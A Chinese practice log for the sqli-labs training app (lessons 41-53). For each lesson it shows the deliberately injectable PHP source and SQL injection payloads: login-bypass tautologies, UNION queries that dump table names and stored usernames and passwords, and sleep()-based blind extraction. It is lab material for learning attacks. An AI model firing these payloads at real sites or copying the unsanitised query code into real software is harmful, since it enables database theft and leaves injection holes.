SQLI-LAB的实战记录(Less41-Less53)

Less - 41 stacked Query Intiger type blind Test Sourse Code Solution Less - 42 Stacked Query error based Test Sourse Code Solution Less - 43 stacked Query String type Test Sourse Code Solution Less - 44 Stacked Query blind Test Sourse Code Solution Less - 45 Stacked Query Blind based twist Test Sourse Code Solution Less - 46 ORDER BY-Error-Numeric Test Sourse Code Solution Less - 47 ORDER BY Clause-Error-Single quote Test Sourse Code Solution Less - 48 ORDER BY Clause Blind based Test Sourse Code Solution Less - 49 ORDER BY Clause Blind based Test Sourse Code Solution Less - 50 ORDER BY Clause Blind based Test Sourse Code Solution Less - 51 ORDER BY Clause Blind based Test Sourse Code Solution Less - 52 ORDER BY Clause Blind based Test Sourse Code Solution Less - 53 ORDER BY Clause Blind based Test Sourse Code Solution

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录，仅供参考。

因为本人学过一些sql注入的内容，所以大部分内容是没有讲解的，如有不清楚的地方，请自行使用搜索引擎查询，相信会得到所需的内容。

Less - 41 stacked Query Intiger type blind

(第41节：层次化查询 数字型 盲注 )

Test:

http://localhost/sqli-lab/Less-41/index.php?id=1'

注：有问题但不显示报错信息

Sourse Code：

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

if (mysqli_multi_query($con1, $sql)){

if ($result = mysqli_store_result($con1)){

if($row = mysqli_fetch_row($result)){

printf("Your Username is : %s", $row[1]);
printf("Your Password is : %s", $row[2]);

}

}

if (mysqli_more_results($con1)) {

}

}

Solution：

http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23

其它：

http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23

http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

Less - 42 Stacked Query error based

(第42节：层次化查询 基于错误)

Test:

http://localhost/sqli-lab/Less-42/index.php

login_user=admin&login_password=11'&mysubmit=login

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”11”’ at line 1

注：password周围是单引号

Sourse Code：

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

if (@mysqli_multi_query($con1, $sql)){

/* store first result set */

if($result = @mysqli_store_result($con1)){

if($row = @mysqli_fetch_row($result)){

if ($row[1]){
return $row[1];

}else{

return 0;

}

}

}else{

echo '';

print_r(mysqli_error($con1));

echo "";

}

}else{

echo '';

print_r(mysqli_error($con1));

echo "";

}

Solution：

login_user=admin&login_password=1' or '1'='1&mysubmit=login

其它：

login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 43 stacked Query String type

(第43节：层次化查询 字符类型)

Test:

http://localhost/sqli-lab/Less-43/index.php

login_user=admin&login_password=11'&mysubmit=login

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”11”)’ at line 1

注：password周围是单引号

Sourse Code：

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

if (@mysqli_multi_query($con1, $sql)){

if($result = @mysqli_store_result($con1)){

if($row = @mysqli_fetch_row($result)){

if ($row[1]){
return $row[1];

}else{

return 0;

}

}

}else{

print_r(mysqli_error($con1));

}

}else{

print_r(mysqli_error($con1));

}

Solution：

login_user=admin&login_password=1') or ('1')=('1&mysubmit=login

其它：

login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 44 Stacked Query blind

(第44节：层次化查询 盲注)

Test:

http://localhost/sqli-lab/Less-44/index.php

login_user=admin&login_password=0'&mysubmit=login

注：没有显示报错信息

Sourse Code：

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

if (@mysqli_multi_query($con1, $sql)){

if($result = @mysqli_store_result($con1)){

if($row = @mysqli_fetch_row($result)){

if ($row[1]){
return $row[1];

}else{

return 0;

}

}

}

}

Solution：

login_user=admin&login_password=1' or '1'='1&mysubmit=login

其它：

login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 45 Stacked Query Blind based twist

(第45节：层次化查询 基于盲注 变形 )

Test:

http://localhost/sqli-lab/Less-45/index.php

login_user=admin&login_password=0'&mysubmit=login

注：没有显示报错信息

Sourse Code：

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

if (@mysqli_multi_query($con1, $sql)){

if($result = @mysqli_store_result($con1)){

if($row = @mysqli_fetch_row($result)){

if ($row[1]){
return $row[1];

}else{

return 0;

}

}

}

}

Solution：

login_user=admin&login_password=1') or ('1')=('1&mysubmit=login

其它：

login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 46 ORDER BY-Error-Numeric

(第46节：GET - 基于错误 - 数字型 - ORDER BY 从句)

Test:

http://localhost/sqli-lab/Less-46/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

注：数字型

http://localhost/sqli-lab/Less-46/index.php?sort=1+asc

http://localhost/sqli-lab/Less-46/index.php?sort=1+desc

注： 可以通过asc 和desc查看返回数据是否相同来简单判断是否存在orderby注入

Sourse Code：

$sql = "SELECT * FROM users ORDER BY $id";

$result = mysql_query($sql);

if ($result){

while ($row = mysql_fetch_assoc($result)){

echo $row['id'];
echo $row['username'];
echo $row['password'];

}

}else{

print_r(mysql_error());

}

Solution：

http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null)

其它：

http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 47 ORDER BY Clause-Error-Single quote

(第47节：ORDER BY 从句 - 基于错误-单引号 )

Test:

http://localhost/sqli-lab/Less-47/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1

注：sort周围是单引号

Sourse Code：

$sql = "SELECT * FROM users ORDER BY '$id'";

$result = mysql_query($sql);

if ($result){

while ($row = mysql_fetch_assoc($result)){

echo $row['id'];
echo $row['username'];
echo $row['password'];

}

}else{

print_r(mysql_error());

}

Solution：

http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

其它：

http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 48 ORDER BY Clause Blind based

(第48节：ORDER BY 从句 基于盲注 )

Test:

http://localhost/sqli-lab/Less-48/index.php?sort=1'

http://localhost/sqli-lab/Less-48/index.php?sort=1"

http://localhost/sqli-lab/Less-48/index.php?sort=1')

http://localhost/sqli-lab/Less-48/index.php?sort=1")

注：均没有显示报错信息

Sourse Code：

$sql = "SELECT * FROM users ORDER BY $id";

$result = mysql_query($sql);

if ($result){

while ($row = mysql_fetch_assoc($result)){

echo $row['id'];
echo $row['username'];
echo $row['password'];

}

}

Solution：

http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null)

其它：

http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 49 ORDER BY Clause Blind based

(第49节：ORDER BY 从句 基于盲注 )

Test:

http://localhost/sqli-lab/Less-49/index.php?sort=1'

注：没有显示报错信息

http://localhost/sqli-lab/Less-49/index.php?sort=1"

注：正常，再结合上一条，sort周围是单引号

Sourse Code：

$sql = "SELECT * FROM users ORDER BY '$id'";

$result = mysql_query($sql);

if ($result){

while ($row = mysql_fetch_assoc($result)){

echo $row['username'];
echo $row['password'];

}

}

Solution：

http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

其它：

http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 50 ORDER BY Clause Blind based

(第50节：ORDER BY 从句 基于盲注)

Test:

http://localhost/sqli-lab/Less-50/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

注：数字型

Sourse Code：

$sql="SELECT * FROM users ORDER BY $id";

if (mysqli_multi_query($con1, $sql)){

if ($result = mysqli_store_result($con1)){

while($row = mysqli_fetch_row($result)){

printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);

}

}

}else{

print_r(mysqli_error($con1));

}

Solution：

http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null)

其它：

http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 51 ORDER BY Clause Blind based

(第51节：ORDER BY 从句 基于盲注 )

Test:

http://localhost/sqli-lab/Less-51/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1

注：sort周围是单引号

Sourse Code：

$sql="SELECT * FROM users ORDER BY '$id'";

if (mysqli_multi_query($con1, $sql)){

if ($result = mysqli_store_result($con1)){

while($row = mysqli_fetch_row($result)){

printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);

}

}

}else{

print_r(mysqli_error($con1));

}

Solution：

http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

其它：

http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 52 ORDER BY Clause Blind based

(第52节：ORDER BY 从句 基于盲注 )

Test:

http://localhost/sqli-lab/Less-52/index.php?sort=1'

http://localhost/sqli-lab/Less-52/index.php?sort=1"

http://localhost/sqli-lab/Less-52/index.php?sort=1')

http://localhost/sqli-lab/Less-52/index.php?sort=1")

注：均没有显示报错信息

Sourse Code：

$sql="SELECT * FROM users ORDER BY $id";

if (mysqli_multi_query($con1, $sql)){

if ($result = mysqli_store_result($con1)){

while($row = mysqli_fetch_row($result)){

printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);

}

}

}

Solution：

http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null)

其它：

http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 53 ORDER BY Clause Blind based

(第53节：ORDER BY 从句 基于盲注 )

Test:

http://localhost/sqli-lab/Less-53/index.php?sort=1'

注：没有显示报错信息

http://localhost/sqli-lab/Less-53/index.php?sort=1"

注：正常，再结合上一条，sort周围是单引号

Sourse Code：

$sql="SELECT * FROM users ORDER BY '$id'";

if (mysqli_multi_query($con1, $sql)) {

if ($result = mysqli_store_result($con1)){

while($row = mysqli_fetch_row($result)){

printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);

}

}

}

Solution：

http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

其它：

http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1